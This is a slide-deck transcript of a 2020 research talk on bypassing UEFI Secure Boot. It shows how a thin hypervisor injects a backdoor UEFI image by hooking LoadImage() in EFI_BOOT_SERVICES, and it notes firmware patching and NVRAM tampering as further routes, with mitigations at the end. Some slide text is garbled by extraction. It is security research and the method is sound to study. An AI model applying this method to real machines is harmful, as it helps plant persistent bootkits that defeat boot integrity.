Bypassing UEFI Secure Boot with Thin-Hypervisor

Transcript

1. Bypassing UEFI Secure Boot with Thin-Hypervisor November 30, 2020 BitVisor

   Summit 9 @retrage

2. Disclaimer: This work is developed for research purpose. No systems

   were harmed.

3. Secure Boot

4. Secure Bootstrapping Secure Boot and Trusted Boot • Booting is

   a chain of state transitions: • Secure Boot: Verifies every state using certificates and hashes • Trusted Boot: Computes hashes of every state [1]

5. UEFI Secure Boot • UEFI image is PE/COFF format •

   Image may have signatures • Firmware verifies images • Loads image if: • It has a valid signature • Its hash is in allowed list • Runs trusted images only Overview [2]

6. LoadImage () • UEFI gives a image the pointer to

   EFI_SYSTEM_TABLE • UEFI image accesses UEFI features via the table • LoadImage () loads UEFI image • Verifies UEFI image on Secure Boot enabled Secure Boot Verification EFI_BOOT_SERVICES + LoadImage (): EFI_IMAGE_LOAD + S ar Image (): EFI_IMAGE_START + ... EFI_SYSTEM_TABLE + EFI_RUNTIME_SERVICES + EFI_BOOT_SERVICES + ...

7. Attacking UEFI Secure Boot

8. Disabling Secure Boot #1 Patching PI firmware • DxeImageVerificationHandler ():

   • Called at LoadImage () to verify the image • Patching it to always return EFI_SUCCESS [2]

9. Disabling Secure Boot #2 Modifying the UEFI Variables in NVRAM

   • Secure Boot state is stored as UEFI variables in NVRAM [4]

10. Alternative Way to Bypass Secure Boot • #1: Patching PI

    Firmware to Disable Secure Boot • Requires manual reverse engineering • #2 Modifying the UEFI Variables in NVRAM to Bypass Security Checks • NVRAM must be write protected (sometimes not) • Alternative way: Patching whole EFI_BOOT_SERVICES

11. Patching EFI_BOOT_SERVICES • DxeBackdoor.efi LoadImage () with Secure Boot disabled

    • Patch target LoadImage () pointer to DxeBackdoor.efi LoadImage () EFI_BOOT_SERVICES + L adI a e (): EFI_IMAGE_LOAD + S a I a e (): EFI_IMAGE_START + ... EFI_SYSTEM_TABLE + EFI_RUNTIME_SERVICES + EFI_BOOT_SERVICES + ... c EFI_BOOT_SERVICES: EFI_IMAGE_LOAD ... ... D eC e.e D eBac d .e L adI a e: (Sec eB E ab ed): Ve I a e () L adI a e: (Sec eB E ab ed): /* Ve I a e () */ L adI a e:

12. DxeBackdoor.efi • Almost all service calls are delegated to target

    functions • .conf section: • Place required functions • Save original functions • Ref: Cr4sh/SmmBackdoor[3]

13. Injecting Backdoor

14. Employing BitVisor to Inject Backdoor Attacker needs to be able

    to access target’s arbitrary memory • Exploiting Vulnerabilities: • Hard to find usable vulnerabilities (especially 0-day) • Deeply depends on target environment • Let’s use BitVisor to emulate the injection attack: • Search tables and function pointers • Load backdoor image and hook function pointers

15. Search Function Pointers Search signatures and locate function pointers •

    Search “IBI SYST”: EFI_SYSTEM_TABLE • Search “BOOTSERV”: EFI_BOOT_SERVICES • Locates from EFI_BOOT_SERVICES: • LoadImage () • StartImage () EFI_BOOT_SERVICES + LoadImage (): EFI_IMAGE_LOAD + S ar Image (): EFI_IMAGE_START + ... EFI_SYSTEM_TABLE + EFI_RUNTIME_SERVICES + EFI_BOOT_SERVICES + ...

16. Load Backdoor UEFI Image • Deploys backdoor from bitvisor.elf •

    Backdoor UEFI image is embedded in bitvisor.elf • Loader parses and loads the backdoor image to guest memory • Creates LoadImage () and StartImage () hooks • Overwrites function pointers

17. Booting Unauthorized Linux

18. Secure Boot is Enabled Enrolls custom PK/KEK/db

19. Denys Booting Unauthorized Linux Secure Boot works properly

20. BitVisor Backdoor Injector Driver

21. BitVisor Backdoor Injector Driver Search tables and functions

22. BitVisor Backdoor Injector Driver Parse embedded backdoor image

23. BitVisor Backdoor Injector Driver Load backdoor image and hook functions

24. Boots Unauthorized Linux Successfully bypass Secure Boot

25. Summary • Existing methods to attacking Secure Boot is limited

    • Patching whole EFI_BOOT_SERVICES • For more general way to bypass Secure Boot • Used BitVisor to emulate arbitrary memory manipulation attack • Mitigations: • Do not reuse system tables • Check function pointer ranges

26. References • [0] https://uefi.org/sites/default/files/resources/UEFI_Spec_2_8_A_Feb14.pdf • [1] B. Parno, J. M.

    McCune, and A. Perrig, “Bootstrapping trust in commodity computers,” in IEEE Symposium on Security and Privacy, 2010, pp. 414–429. • [2]A. Matrosov, E. Rodionov, and S. Bratus, “Rootkits and Bootkits”, No Starch Press, 2019. • [3] https://github.com/Cr4sh/SmmBackdoor • [4] Y. Bulygin, J. Loucaides, A. Furtak, O.Bazhaniuk, and A. Matrosov, “Summary of Attacks Against BIOS and Secure Boot,” DEF CON, 2014.

27. Appendix

28. Legacy BIOS • Master Boot Record: • First 512 byes

    of disk • Includes: • Bootstrap code • 4 partition entries • No native security features • Easily modify MBR No Security Features [2]

29. Backdoor Injector BitVisor Driver • Create DxeBackdoor.efi from custom EDK2

    package • Use “objcopy -lbinary” to convert DxeBackdoor.efi to backdoor.o • Implemented PE/COFF loader for backdoor injector BitVisor driver • Parses headers • Loads based on section information • Supports minimal relocations